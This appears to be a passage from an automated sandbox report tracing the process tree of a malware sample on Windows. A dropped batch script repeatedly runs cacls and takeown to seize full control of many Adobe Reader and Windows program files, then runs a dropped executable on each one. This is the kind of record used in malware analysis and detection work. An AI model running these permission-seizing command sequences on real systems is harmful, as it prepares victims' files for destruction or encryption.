  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1904
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1564
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1384
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  - Loads dropped DLL
  PID:732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:512
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1408
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  - Loads dropped DLL
  PID:1656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      Executes dropped EXE
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  - Loads dropped DLL
  PID:384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    - Modifies file permissions
    PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1772
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      Executes dropped EXE
      PID:1860
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  - Loads dropped DLL
  PID:596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    PID:652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:2028
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:776
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  - Loads dropped DLL
  PID:820
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    PID:916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "end_review.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:648
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "end_review.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1904
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  PID:1112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    - Modifies file permissions
    PID:1140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "pdf.gif" -nobanner
    3⤵
    PID:1176
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "pdf.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:204
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    PID:652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      PID:732
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:916
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:1092
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1168
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  PID:1972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    PID:228
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1084
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  PID:728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      PID:1044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:1524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:1980
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      PID:592
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:272
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:872
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  PID:1896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    - Modifies file permissions
    PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:1176
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "usa.fca" -nobanner
      4⤵
      PID:788
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  PID:1128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    3⤵
    PID:968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "CENTEURO.TXT" -nobanner
    3⤵
    PID:984
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "CENTEURO.TXT" -nobanner
      4⤵
      PID:1704
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  PID:732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    - Modifies file permissions
    PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      PID:1640
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  PID:916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
    3⤵
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "CP1257.TXT" -nobanner
    3⤵
    PID:648
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "CP1257.TXT" -nobanner
      4⤵
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui""
  2⤵
  PID:1092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui""
  2⤵
  PID:220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui"
    3⤵
    PID:968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:1704
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui""
  2⤵
  PID:1084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui"
    3⤵
    PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:1796
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:1988
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui""
  2⤵
  PID:684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui"
    3⤵
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:648
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui""
  2⤵
  PID:916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui"
    3⤵
    - Modifies file permissions
    PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:208
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""
  2⤵
  PID:432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"
    3⤵
    - Modifies file permissions
    PID:968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Genko_1.jtp" -nobanner
    3⤵
    PID:1704
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Genko_1.jtp" -nobanner
      4⤵
      PID:1044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""
  2⤵
  PID:220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"
    3⤵
    PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "To_Do_List.jtp" -nobanner
    3⤵
    PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "To_Do_List.jtp" -nobanner
      4⤵
      PID:1796
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1980
